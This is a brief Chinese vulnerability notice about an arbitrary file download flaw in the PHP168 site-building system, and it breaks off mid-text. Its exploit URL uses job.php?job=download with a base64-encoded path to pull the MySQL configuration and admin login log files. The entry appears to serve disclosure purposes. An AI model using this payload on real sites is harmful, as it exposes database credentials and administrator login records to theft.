PHP168 下载任意文件漏洞

PHP168整站是PHP领域当前功能最强大的建站系统，代码全部开源，可极其方便的进行二次开发，所有功能模块可以自由安装与删除，个人用户完全免费使用。 利用了程序的编码漏洞，下载配置和登陆日志文件 2008 暂无 http://www.php168.com/ 下载 mysqlconfig.php 和 adminloginlogs.php 两个文件到本地。 http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="...